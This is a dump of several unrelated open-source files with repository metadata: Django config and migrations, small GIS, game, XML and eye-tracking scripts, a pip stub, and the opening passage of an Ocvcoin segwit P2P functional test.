653bb7acba9a368257cf1ea6a0b12134c55742d7 | c659aa4843d7514cf5e6b26c1830ab57cf1e784c | /branch/chrisBranch/novella/novella/wsgi.py | 8f642d5f714bbc400cb6ff9291275e96aa4c4081 | [] | no_license | affanhmalik/novella | 355afdd529d0becb1ef3e47d9aae7b3e4042ed87 | 29a06f2d01e17bea6661056756be60cc91399c5f | refs/heads/master | 2020-05-14T12:08:26.260848 | 2014-07-28T03:29:50 | 2014-07-28T03:29:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | """
WSGI config for novella project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
import sys

# Make the project package importable *before* Django loads the settings
# module.  In the original this append ran after get_wsgi_application(),
# too late to influence how the settings/application modules are resolved.
sys.path.append('/home/ubuntu/code/project/novella')

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "novella.settings")

from django.core.wsgi import get_wsgi_application

# WSGI callable picked up by the application server (gunicorn/uwsgi/mod_wsgi).
application = get_wsgi_application()
| [
"cniusfu2013@gmail.com"
] | cniusfu2013@gmail.com |
8369fe1e177a9529548c9c93a67aa894e39be3dc | 6dbbf8cf156cc07929f6af4deafef08feb54d5dc | /ArcGIS_Scripts/describeRasters.py | f0062567dd1892ab17bf0cf5f13f3ebe851249a8 | [] | no_license | sishui198/myGISPythonCode | 03a346c87b0a311a995b503494a9188cbe6888c0 | cb33c442b37d312678ba2ee303945b10e46b855c | refs/heads/master | 2022-02-21T01:44:39.460106 | 2018-05-06T23:59:36 | 2018-05-06T23:59:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | try:
import arcpy
from arcpy import env
env.workspace = "C:\EsriPress\Python\Data\Exercise09"
raster = "tm.img"
desc = arcpy.Describe(raster)
print "Raster baseName is: " + desc.basename
print "Raster dataType is: {0}".format(desc.dataType)
print "Raster fileExtension is: {0}".format(desc.extension)
print "Raster spatial reference is: {0}".format(desc.spatialReference.name)
print "Raster format is: {0}".format(desc.format)
print "Raster compression type is {0}".format(desc.compressionType)
print "Raster number of bands is: " + str(desc.bandCount)
except Exception , e:
str(e) | [
"noreply@github.com"
] | noreply@github.com |
d420974adf0a6be10681461db969d12898692087 | f4127951720368c12704020e4b54eb434c073528 | /HumanVsCom.py | f40059b2c19f2b830cf5f1a6b6482b58448133d7 | [] | no_license | Nayanikag/TicTacToe | 985188b35463bca43f790de19116ba5fe57234b6 | 9d266c7bfb3aa8618a34e7ad179720efe3c835df | refs/heads/main | 2023-02-09T16:01:09.524888 | 2020-12-28T16:45:34 | 2020-12-28T16:45:34 | 325,062,803 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,436 | py | '''
-----------------------Authors-------------------------
Nayanika Ghosh - 4191 4976
Disha Nayar - 6199 1035
-------------------------------------------------------
'''
import numpy as np
import pickle
class PlayHumanvsCom():
    """Interactive tic-tac-toe: a human (X, stored as 1) versus a trained
    model (O, stored as -1) on a flat 9-cell board (0 = empty).

    The opponent's move comes from one of three pre-trained regressors
    (linear / KNN / MLP) loaded from machine-specific paths.
    """

    # All eight winning triples of board indices.
    _WIN_LINES = ((0, 1, 2), (3, 4, 5), (6, 7, 8),   # rows
                  (0, 3, 6), (1, 4, 7), (2, 5, 8),   # columns
                  (0, 4, 8), (2, 4, 6))              # diagonals

    def __init__(self):
        # NOTE: constructing the object immediately starts the game loop.
        self.play()

    def _is_winner(self, board, player):
        """Return True if *player* (1 or -1) occupies a full winning line.

        Replaces the two duplicated 8-way boolean conditions of the
        original implementation.
        """
        return any(board[a] == board[b] == board[c] == player
                   for a, b, c in self._WIN_LINES)

    def predict_LR(self, board):
        """Score every cell with a hand-rolled linear regressor and return a
        length-9 one-hot vector marking the best *empty* cell.

        The weight file holds a 9x10 matrix: one row per output cell, bias
        weight first.  NOTE(review): the path is machine-specific.
        """
        board_lr = np.append(1, board)  # prepend the bias input
        weights = np.loadtxt('/Users/nghosh/Desktop/Deeplearning/LRWeights.txt')
        # One dot product per output cell.  Using the 1-D rows gives scalar
        # scores; the original kept (1,)-shaped arrays in a (9, 1) array,
        # which made list.index(np.max(...)) raise ValueError.
        scores = np.array([np.dot(board_lr, weights[i]) for i in range(9)])
        best = int(np.argmax(scores))
        while board[best] != 0:
            # Knock occupied cells out of the running; -inf (not 0, as the
            # original used) so all-negative scores cannot re-select them.
            scores[best] = -np.inf
            best = int(np.argmax(scores))
        one_hot = np.zeros(9)
        one_hot[best] = 1
        return one_hot

    def select_regressor(self):
        """Prompt for the opponent model; return the raw input string."""
        print("Enter 1 to play against Linear Regressor")
        print("Enter 2 to play against KNN Regressor")
        print("Enter 3 to play against MLP Regressor")
        return input()

    def take_input(self):
        '''
        This function takes a cell number as input from the user
        the cell number needs to be between 1 to 9 and should be empty
        :return: string
        '''
        print("Enter cell number")
        return input()

    def decode(self, cell_value):
        '''
        Decode a board value for display: -1 -> O, 1 -> X, 0 -> blank.
        :param cell_value: takes the value 0, -1 or 1
        :return: display string
        '''
        if cell_value == 0:
            return '   '
        elif cell_value == -1:
            return 'O '
        else:
            return 'X '

    def display_board(self, board=[]):
        '''
        Print the current board state.  The default [] is read-only here,
        so the shared mutable default is harmless.
        :param board: the current state of the board
        :return: None
        '''
        print(self.decode(board[0]) + '|' + self.decode(board[1]) + '|' + self.decode(board[2]))
        print("-- -- --")
        print(self.decode(board[3]) + '|' + self.decode(board[4]) + '|' + self.decode(board[5]))
        print("-- -- --")
        print(self.decode(board[6]) + '|' + self.decode(board[7]) + '|' + self.decode(board[8]))
        print("''''''''''''''''''''''''''''''''''''''''''''''''''''''''")

    def _predict_move(self, regressor, board):
        """Return the candidate cell indices for the computer's move."""
        if regressor == '1':
            y_pred = self.predict_LR(board)
            return [i for i, val in enumerate(y_pred) if val == 1]
        if regressor == '2':
            path = '/Users/nghosh/Desktop/Deeplearning/knnweights'
        else:
            path = '/Users/nghosh/Desktop/Deeplearning/MLPWeights'
        # `with` closes the pickle file; the original leaked the handle.
        with open(path, 'rb') as fh:
            model = pickle.load(fh)
        y_pred = model.predict(np.asarray(board).reshape(1, -1))
        y_pred = np.where(y_pred > 0.5, 1, 0)
        return [i for i, val in enumerate(y_pred[0]) if val == 1]

    def play(self):
        '''
        Run the interactive game loop until a win or a draw.
        :return: None
        '''
        print("Lets Play!!!!")
        regressor = self.select_regressor()
        # Validate once up front.  The original validated inside the game
        # loop and, on an unknown value, printed "Enter a valid regressor!"
        # forever without re-prompting (infinite loop).
        while regressor not in ('1', '2', '3'):
            print("Enter a valid regressor!")
            regressor = self.select_regressor()
        print("Enter a cell number (1 to 9)")
        board = [0] * 9
        self.display_board(board)
        while board.count(0) != 0:
            # ----- human move -----
            cell = self.take_input()
            while (int(cell) < 1 or int(cell) > 9) or board[int(cell) - 1] != 0:
                print("Please enter a valid input")
                cell = self.take_input()
            board[int(cell) - 1] = 1
            self.display_board(board)
            if self._is_winner(board, 1):
                print("human won")
                break
            if board.count(0) == 0:
                print("Its a Draw!!")
                break
            # ----- computer move -----
            pos_op = self._predict_move(regressor, board)
            board[np.random.choice(a=np.array(pos_op))] = -1
            self.display_board(board)
            if self._is_winner(board, -1):
                print("comp won")
                break
if __name__ == "__main__":
play = PlayHumanvsCom()
| [
"noreply@github.com"
] | noreply@github.com |
6f310fb4021e58a16a26e9b61fa33bb68a69b23b | e1091df0ce19a786924ac176a8a7ad158c0ff898 | /datascrape/wk5XMLassignment.py | bd69745590b800a81e49d2c0432a475f8f73d808 | [] | no_license | tanupat92/learnComsci | 4c9a8201f07da80e92eb6f6ad54b3d461926f18a | de1cbe5ac63cf46fc3b953011eb4582f31f01871 | refs/heads/master | 2021-12-14T02:13:16.219495 | 2021-12-11T05:10:25 | 2021-12-11T05:10:25 | 235,941,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 15 12:03:21 2020
@author: tanupatsurface
"""
#http://py4e-data.dr-chuck.net/comments_372615.xml
# Week 5 XML assignment: fetch an XML document from a user-supplied URL,
# locate every comments/comment node and report how many there are plus
# the sum of their <count> values.
import urllib.request, urllib.parse, urllib.error
import xml.etree.ElementTree as ET

url = input('Enter location: ')
document = urllib.request.urlopen(url).read()
root = ET.fromstring(document)
comments = root.findall('comments/comment')
count_sum = sum(int(node.find('count').text) for node in comments)
print('Count:', len(comments))
print('Sum:', count_sum)
"tanupat92@gmail.com"
] | tanupat92@gmail.com |
93a32431b1829ea2c4c0c45bf3d687cd85aa98b1 | de470351e95007d24430955b68431c55319488a3 | /Old/behav_gaze_df_transinf.py | a4dfaf13098f6db5ddef525cdec5ad04552d7fc6 | [] | no_license | marthabawn/EyeTracking | 31ea2cfa94913636c82fd76ddacc12deb2690787 | d96a53e1c53dcf81be9d14070deada889000c2eb | refs/heads/master | 2021-01-23T11:54:34.238569 | 2015-06-05T00:32:29 | 2015-06-05T00:32:29 | 30,372,988 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,857 | py | import numpy as np
import pandas as pd
import glob
import os
# Practice trials all map to the same condition label.
dict_practice = {1: 'IneqEq0', 2: 'IneqEq0'}

# You need two text files listing the condition each trial corresponds to.
def _load_trial_dict(path):
    """Read a whitespace-delimited "trial condition" file into {int: str}.

    Each line holds a trial number and its condition label; used to map
    setA/setB trials to experimental conditions.
    """
    mapping = {}
    with open(path, 'r') as trial_file:
        for line in trial_file:
            (key, val) = line.split()
            mapping[int(key)] = val
    # No explicit close needed: the with-block already closed the file
    # (the original called .close() redundantly after each with-block).
    return mapping

dict_setA = _load_trial_dict("Dictionaries/trans_setA_list.txt")
dict_setB = _load_trial_dict("Dictionaries/trans_setB_list.txt")
def map_trial_to_condition(row):
    """Return the condition label for one behavioral-data row.

    row[2] is the block name ('practice', 'setA' or 'setB') and row[3] is
    the trial number; 'N/A' is returned when no mapping is defined.
    """
    block_tables = {
        'practice': dict_practice,
        'setA': dict_setA,
        'setB': dict_setB,
    }
    table = block_tables.get(row[2])
    if table is not None and row[3] in table:
        return table[row[3]]
    return 'N/A'
### Create dataframe pd from behavioral data
# NOTE(review): this script is Python 2 (bare `print` statement below) and
# targets an old pandas API (`df.sort`, `df.append`) — keep the interpreter
# and pandas versions matched if this is ever rerun.
df = pd.DataFrame()
# Reads all the _behavioral files in the folder specified.
# Filenames look like "<PID>_..._<block>_behavioralout.txt"; the PID is the
# first 5 characters and the block is the third underscore-separated part.
for f in glob.glob("TransInf_Behav_Data/*behavioralout.txt"):
    filename = os.path.basename(f)
    filename_parts = filename.split('_')
    if filename_parts[2] == 'practice':
        subject = filename_parts[0][:5]+filename_parts[2]
    else:
        # Non-practice blocks append only the block's last character (e.g. 'A'/'B').
        subject = filename_parts[0][:5] + filename_parts[2][-1]
    block = filename_parts[2]
    group = filename_parts[0][:2]
    print "processing subject:", subject #, block
    with open(f, 'r') as csvfile:
        dfTemp = pd.read_csv(csvfile, delimiter='\t', header=None, names=['Trial', 'Infer', 'CorrectAnswer',
                                                                          'SubjectResponse', 'ProbRel', 'RT', 'RT_Unc'])
        if len(dfTemp) == 0:
            continue
        dfTemp.insert(0, 'PID', subject)
        dfTemp.insert(1, 'Group', group)
        dfTemp.insert(2, 'Block', block)
        # Accuracy is 1 when the subject's response matched the correct answer.
        dfTemp['Accuracy'] = np.where(dfTemp['CorrectAnswer'] == dfTemp['SubjectResponse'], 1, 0)
        dfNewCol = dfTemp.apply(map_trial_to_condition, axis=1)
        dfTemp.insert(3, 'Condition', dfNewCol)
        df = df.append(dfTemp, ignore_index=True)
# Sort by subject then trial and rebuild a clean integer index.
df = df.sort(['PID', 'Trial'])
df = df.reset_index()
df = df.drop('index', axis=1)
### Create dataframe gaze_stats from gaze data (exported by Ogama)
gaze_stats = pd.read_csv('Gaze_Stats/LSAT_T1transinf_gaze_statistics1-16.txt', delimiter='\t', header=None)
gaze_stats.columns = ['PID', 'Comments', 'Trial', 'ConditionNumber','Duration','Fix/SaccadeRatio','TimeToTarget',
                      'FixationsInTarget', 'TotalFixTimeInTarget','TimeToNontarget', 'FixationsInNontarget',
                      'TotalFixTimeInNontarget', 'TimeToQuestion', 'FixationsInQuestion','TotalFixTimeInQuestion','extra']
gaze_stats = gaze_stats.dropna(how='all') # Ogama adds an empty column and row to the end
gaze_stats = gaze_stats.dropna(axis=1,how='all')
gaze_stats = gaze_stats.drop(gaze_stats.index[0]) # these are the Ogama labels, which are really long
gaze_stats = gaze_stats.reset_index()
# Trial numbers arrive as strings/floats after the header cleanup; force ints
# so they merge against the behavioral dataframe's integer 'Trial' column.
gaze_stats['Trial'] = gaze_stats['Trial'].astype(int)
### Create dataframe new_df with all behavioral + gaze data
new_df = df.merge(gaze_stats, how='outer', sort=False)
column_order = ['PID', 'Comments', 'Block', 'Trial', 'Condition', 'Infer', 'CorrectAnswer', 'SubjectResponse',
                'Accuracy', 'ProbRel', 'RT', 'RT_Unc', 'Duration', 'Fix/SaccadeRatio', 'TimeToTarget',
                'FixationsInTarget', 'TotalFixTimeInTarget', 'TimeToNontarget', 'FixationsInNontarget',
                'TotalFixTimeInNontarget', 'TimeToQuestion', 'FixationsInQuestion', 'TotalFixTimeInQuestion']
new_df = new_df[column_order]

# Remove block name from PID. Vectorized string slice replaces the original
# per-row chained assignment (new_df['PID'][i] = ...), which writes through a
# temporary copy and is unreliable in modern pandas.
new_df['PID'] = new_df['PID'].str[0:5]

# Allow for different sequence for rt101 (this subject saw a different
# trial-to-condition ordering, hard-coded here).
rt101_conditions = ['IneqEq2', 'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqIneq1', 'IneqIneq2', 'IneqIneq0', 'IneqIneq1',
                    'IneqIneq0', 'IneqEq0', 'IneqEq1', 'IneqEq0', 'IneqIneq0', 'IneqEq2', 'IneqEq2', 'IneqIneq2',
                    'IneqEq2', 'IneqIneq0', 'IneqIneq0', 'IneqIneq2', 'IneqIneq2', 'IneqEq1', 'IneqIneq1', 'IneqEq0',
                    'IneqEq0', 'IneqIneq2', 'IneqEq0', 'IneqEq0', 'IneqIneq0', 'IneqIneq2', 'IneqEq2', 'IneqEq2',
                    'IneqIneq1', 'IneqEq1', 'IneqEq1', 'IneqIneq2', 'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqIneq2',
                    'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqIneq0', 'IneqEq0', 'IneqIneq2', 'IneqEq1', 'IneqIneq0',
                    'IneqIneq2', 'IneqEq1', 'IneqIneq1', 'IneqEq2', 'IneqEq1', 'IneqEq0', 'IneqEq0', 'IneqIneq1',
                    'IneqIneq0', 'IneqIneq0', 'IneqEq0', 'IneqIneq1']
if new_df['PID'][0] == 'rt101':
    # Positional write via .iloc replaces the chained assignment
    # new_df['Condition'][0:60] = ..., which may silently write to a copy.
    new_df.iloc[0:60, new_df.columns.get_loc('Condition')] = rt101_conditions

new_df.to_csv('All_Stats/LSAT_T1transinf_behavioral_gaze_statistics1-16.csv')
| [
"martha.bawn@berkeley.edu"
] | martha.bawn@berkeley.edu |
646d95c185fca0a27dada15c7b6529fcfe5624e7 | 96cdc5b05fdcd534f7c50051d87f07e7d5d3eeca | /treehouse/dashboard/migrations/0001_initial.py | b5a291cd85bc7da06785556e1b50331cfec90bb9 | [] | no_license | zhm12359/fam_tree | ca8cde69b9f0329a07f01d7a5428b300ff63ed7f | d532ae715ebaa338dd9d04b3844772867a1a6339 | refs/heads/master | 2022-12-28T11:55:25.954308 | 2020-06-05T18:20:31 | 2020-06-05T18:20:31 | 116,883,868 | 0 | 0 | null | 2022-05-25T00:25:38 | 2018-01-09T23:45:26 | Python | UTF-8 | Python | false | false | 809 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-01-14 03:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial (auto-generated) migration: creates the dashboard ``Person`` table.

    Each Person stores a name plus four "big"/"assistant big" relationships,
    kept as plain CharFields rather than foreign keys.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Person',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('big', models.CharField(max_length=200)),
                ('assistant_big', models.CharField(max_length=200)),
                ('big_2', models.CharField(max_length=200)),
                ('assistant_big_2', models.CharField(max_length=200)),
            ],
        ),
    ]
| [
"hz926@nyu.edu"
] | hz926@nyu.edu |
4ae8db22431c5e07ecd077901741065e803ae3f1 | 96f3bfdc79d64869a627f52edbbb227cb5bc10b8 | /venv/bin/pip | f6be3a7cd28627775c3f09ea0fa180298e94e2e7 | [] | no_license | jwndhonoferry/testPySpark | 9330c911502c7dd5edcf124bf2391ec8811f2895 | 0f696595effc6a6bfdf4d38720a0a297d407bd10 | refs/heads/master | 2023-03-23T07:17:24.900233 | 2021-03-17T09:12:15 | 2021-03-17T09:12:15 | 331,209,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/home/jwndhono/PycharmProjects/testPySpark/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
# Console-script stub generated by pip's installer; do not edit by hand.
if __name__ == '__main__':
    # Strip a trailing '-script.pyw' or '.exe' from argv[0] so the program
    # name reported by pip matches the command the user invoked.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"ferryjwndhono@gmail.com"
] | ferryjwndhono@gmail.com | |
8da30b113987bded98b34ce10e865f20b739abae | 771ee6b116368503106729025c72c333aa5752e3 | /shopys/apps/catalog/migrations/0001_initial.py | 5876ebef2b4c2ed65c82bda6d309467ce9b1bd66 | [] | no_license | zhaolikuns/shopsys | 732e501806e33c0922d913c3255fd1bb4bfbfa32 | ec8d2490d5b0b32b172040358532d06b6fddc6c7 | refs/heads/master | 2021-03-16T05:07:09.014705 | 2017-05-21T13:04:00 | 2017-05-21T13:04:00 | 91,534,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,831 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-18 05:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial (auto-generated) catalog migration.

    Creates the ``Category`` and ``Product`` tables (db tables 'categories'
    and 'products') with a many-to-many link from Product to Category.
    Verbose names and help texts are in Chinese, as authored.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50, verbose_name='产品类型')),
                ('slug', models.SlugField(help_text='根据name生成的,用于生成界面url,必须唯一', unique=True, verbose_name='Slug')),
                ('description', models.TextField(verbose_name='描述')),
                ('is_active', models.BooleanField(default=True, verbose_name='是否激活')),
                ('meta_keywords', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='meta 关键字')),
                ('meta_description', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='meta 关键字')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
            ],
            options={
                'db_table': 'categories',
                'verbose_name_plural': '产品类型',
                'ordering': ['-create_time'],
                'verbose_name': '产品类型',
            },
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, unique=True, verbose_name='产品名称')),
                ('slug', models.SlugField(help_text='根据name生成的,用于生成界面url,必须唯一', max_length=255, unique=True, verbose_name='Slug')),
                ('brand', models.CharField(max_length=50, verbose_name='品牌')),
                ('sku', models.CharField(max_length=50, verbose_name='计量单位')),
                ('price', models.DecimalField(decimal_places=2, max_digits=9, verbose_name='价格')),
                ('old_price', models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=9, verbose_name='旧价格')),
                ('image', models.ImageField(max_length=50, upload_to='', verbose_name='图片')),
                ('is_active', models.BooleanField(default=True, verbose_name='设为激活')),
                ('is_bestseller', models.BooleanField(default=False, verbose_name='标为畅销')),
                ('is_featured', models.BooleanField(default=False, verbose_name='标为推荐')),
                ('quantity', models.IntegerField(default=1, verbose_name='数量')),
                ('description', models.TextField(verbose_name='描述')),
                ('meta_keywords', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='Meta 关键词')),
                ('meta_description', models.CharField(help_text='关键字输入区域', max_length=255, verbose_name='meta 关键字')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
                ('categories', models.ManyToManyField(to='catalog.Category')),
            ],
            options={
                'db_table': 'products',
                'verbose_name_plural': '产品名称',
                'ordering': ['-create_time'],
                'verbose_name': '产品名称',
            },
        ),
    ]
| [
"355149444@qq.com"
] | 355149444@qq.com |
3691083811d7321c87cdbb05e8c670f027fec3f9 | 5167f77d96d1dc5412a8a0a91c95e3086acd05dc | /test/functional/p2p_segwit.py | ceccca331b56c3e9dca0b314718090ac21ff9ef9 | [
"MIT"
] | permissive | ocvcoin/ocvcoin | 04fb0cea7c11bf52e07ea06ddf9df89631eced5f | 79c3803e330f32ed50c02ae657ff9aded6297b9d | refs/heads/master | 2023-04-30T10:42:05.457630 | 2023-04-15T11:49:40 | 2023-04-15T11:49:40 | 406,011,904 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 100,563 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2020 The Ocvcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test segwit transactions and blocks on P2P network."""
from decimal import Decimal
import math
import random
import struct
import time
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment, get_witness_script, WITNESS_COMMITMENT_HEADER
from test_framework.key import ECKey
from test_framework.messages import (
BIP125_SEQUENCE_NUMBER,
CBlock,
CBlockHeader,
CInv,
COutPoint,
CTransaction,
CTxIn,
CTxInWitness,
CTxOut,
CTxWitness,
MAX_BLOCK_BASE_SIZE,
MSG_BLOCK,
MSG_TX,
MSG_WITNESS_FLAG,
MSG_WITNESS_TX,
MSG_WTX,
NODE_NETWORK,
NODE_WITNESS,
msg_no_witness_block,
msg_getdata,
msg_headers,
msg_inv,
msg_tx,
msg_block,
msg_no_witness_tx,
ser_uint256,
ser_vector,
sha256,
tx_from_hex,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock,
)
from test_framework.script import (
CScript,
CScriptNum,
CScriptOp,
MAX_SCRIPT_ELEMENT_SIZE,
OP_0,
OP_1,
OP_2,
OP_16,
OP_2DROP,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_DROP,
OP_ELSE,
OP_ENDIF,
OP_IF,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SIGHASH_ANYONECANPAY,
SIGHASH_NONE,
SIGHASH_SINGLE,
SegwitV0SignatureHash,
LegacySignatureHash,
hash160,
)
from test_framework.script_util import (
key_to_p2wpkh_script,
keyhash_to_p2pkh_script,
script_to_p2sh_script,
script_to_p2wsh_script,
)
from test_framework.test_framework import OcvcoinTestFramework
from test_framework.util import (
assert_equal,
softfork_active,
hex_str_to_bytes,
assert_raises_rpc_error,
)
# The versionbit bit used to signal activation of SegWit
VB_WITNESS_BIT = 1
VB_TOP_BITS = 0x20000000
MAX_SIGOP_COST = 80000
SEGWIT_HEIGHT = 120
class UTXO():
    """A spendable anyone-can-spend outpoint (txid, index, value) saved for later subtests."""
    def __init__(self, sha256, n, value):
        # Attribute names match what the test code reads: sha256/n identify
        # the outpoint, nValue is the output amount in satoshis.
        self.sha256, self.n, self.nValue = sha256, n, value
def sign_p2pk_witness_input(script, tx_to, in_idx, hashtype, value, key):
    """Add signature for a P2PK witness program.

    Computes the BIP143 (segwit v0) sighash, signs it with *key*, appends the
    hashtype byte, and installs [signature, script] as the input's witness.
    """
    sighash = SegwitV0SignatureHash(script, tx_to, in_idx, hashtype, value)
    # bytes([hashtype]) is the single hashtype byte appended to the DER sig.
    der_sig = key.sign_ecdsa(sighash) + bytes([hashtype])
    tx_to.wit.vtxinwit[in_idx].scriptWitness.stack = [der_sig, script]
    tx_to.rehash()
def get_virtual_size(witness_block):
    """Calculate the virtual size of a witness block.

    Virtual size is base + witness/4, i.e. ceil(weight / 4) where
    weight = 3 * base_size + total_size."""
    base_size = len(witness_block.serialize(with_witness=False))
    total_size = len(witness_block.serialize())
    # Integer ceiling division ("+ 3" rounds up); avoids the original's
    # float division, which could lose precision for very large sizes.
    return (3 * base_size + total_size + 3) // 4
def test_transaction_acceptance(node, p2p, tx, with_witness, accepted, reason=None):
    """Send a transaction to the node and check that it's accepted to the mempool

    - Submit the transaction over the p2p interface
    - use the getrawmempool rpc to check for acceptance."""
    expected_msgs = [reason] if reason else []
    with node.assert_debug_log(expected_msgs=expected_msgs):
        # Choose the serialization: full (with witness) or stripped.
        message = msg_tx(tx) if with_witness else msg_no_witness_tx(tx)
        p2p.send_and_ping(message)
    assert_equal(tx.hash in node.getrawmempool(), accepted)
def test_witness_block(node, p2p, block, accepted, with_witness=True, reason=None):
    """Send a block to the node and check that it's accepted

    - Submit the block over the p2p interface
    - use the getbestblockhash rpc to check for acceptance."""
    expected_msgs = [] if reason is None else [reason]
    with node.assert_debug_log(expected_msgs=expected_msgs):
        # Serialize with or without witness data as requested.
        message = msg_block(block) if with_witness else msg_no_witness_block(block)
        p2p.send_and_ping(message)
    assert_equal(node.getbestblockhash() == block.hash, accepted)
class TestP2PConn(P2PInterface):
    """P2P test connection that records getdata/wtxidrelay traffic for inspection."""

    def __init__(self, wtxidrelay=False):
        super().__init__(wtxidrelay=wtxidrelay)
        # Set of all inv hashes this peer has been asked for via getdata.
        self.getdataset = set()
        # Most recent wtxidrelay messages / getdata inv list received.
        self.last_wtxidrelay = []
        self.lastgetdata = []
        self.wtxidrelay = wtxidrelay

    # Don't send getdata message replies to invs automatically.
    # We'll send the getdata messages explicitly in the test logic.
    def on_inv(self, message):
        pass

    def on_getdata(self, message):
        # Remember both the latest request and the cumulative set of hashes.
        self.lastgetdata = message.inv
        for inv in message.inv:
            self.getdataset.add(inv.hash)

    def on_wtxidrelay(self, message):
        self.last_wtxidrelay.append(message)

    def announce_tx_and_wait_for_getdata(self, tx, success=True, use_wtxid=False):
        """Inv a transaction (by txid or wtxid) and wait for (or assert absence of) a getdata."""
        if success:
            # sanity check: wtxid announcements only make sense on a wtxidrelay peer
            assert (self.wtxidrelay and use_wtxid) or (not self.wtxidrelay and not use_wtxid)
        with p2p_lock:
            self.last_message.pop("getdata", None)
        if use_wtxid:
            wtxid = tx.calc_sha256(True)
            self.send_message(msg_inv(inv=[CInv(MSG_WTX, wtxid)]))
        else:
            self.send_message(msg_inv(inv=[CInv(MSG_TX, tx.sha256)]))

        if success:
            if use_wtxid:
                self.wait_for_getdata([wtxid])
            else:
                self.wait_for_getdata([tx.sha256])
        else:
            # No positive signal exists for "not requested"; sleep then check.
            time.sleep(5)
            assert not self.last_message.get("getdata")

    def announce_block_and_wait_for_getdata(self, block, use_header, timeout=60):
        """Announce a block via headers (or inv+headers) and wait for the getdata."""
        with p2p_lock:
            self.last_message.pop("getdata", None)
            self.last_message.pop("getheaders", None)
        msg = msg_headers()
        msg.headers = [CBlockHeader(block)]
        if use_header:
            self.send_message(msg)
        else:
            # inv-only announcements are answered with getheaders first.
            self.send_message(msg_inv(inv=[CInv(MSG_BLOCK, block.sha256)]))
            self.wait_for_getheaders()
            self.send_message(msg)
        self.wait_for_getdata([block.sha256])

    def request_block(self, blockhash, inv_type, timeout=60):
        """Request a block by hash with the given inv type and return the received block."""
        with p2p_lock:
            self.last_message.pop("block", None)
        self.send_message(msg_getdata(inv=[CInv(inv_type, blockhash)]))
        self.wait_for_block(blockhash, timeout)
        return self.last_message["block"].block
class SegWitTest(OcvcoinTestFramework):
    def set_test_params(self):
        """Configure 3 nodes: non-standard-accepting, standard-only, and segwit-disabled."""
        self.setup_clean_chain = True
        self.num_nodes = 3
        # This test tests SegWit both pre and post-activation, so use the normal BIP9 activation.
        self.extra_args = [
            # node0: accepts non-standard txs, segwit activates at SEGWIT_HEIGHT
            ["-acceptnonstdtxn=1", "-segwitheight={}".format(SEGWIT_HEIGHT), "-whitelist=noban@127.0.0.1"],
            # node1: standardness rules enforced
            ["-acceptnonstdtxn=0", "-segwitheight={}".format(SEGWIT_HEIGHT)],
            # node2: segwit never activates (-segwitheight=-1)
            ["-acceptnonstdtxn=1", "-segwitheight=-1"],
        ]
        self.supports_cli = False
    def skip_test_if_missing_module(self):
        # Wallet RPCs (e.g. sendtoaddress in test_getblocktemplate_before_lockin)
        # are used, so skip when the build has no wallet.
        self.skip_if_no_wallet()
    def setup_network(self):
        """Connect node0 to node1 and node2 (star topology; no direct 1<->2 link)."""
        self.setup_nodes()
        self.connect_nodes(0, 1)
        self.connect_nodes(0, 2)
        self.sync_all()
# Helper functions
def build_next_block(self, version=4):
"""Build a block on top of node0's tip."""
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount() + 1
block_time = self.nodes[0].getblockheader(tip)["mediantime"] + 1
block = create_block(int(tip, 16), create_coinbase(height), block_time)
block.nVersion = version
block.rehash()
return block
def update_witness_block_with_transactions(self, block, tx_list, nonce=0):
"""Add list of transactions to block, adds witness commitment, then solves."""
block.vtx.extend(tx_list)
add_witness_commitment(block, nonce)
block.solve()
    def run_test(self):
        """Run every subtest, first pre-activation then post-activation."""
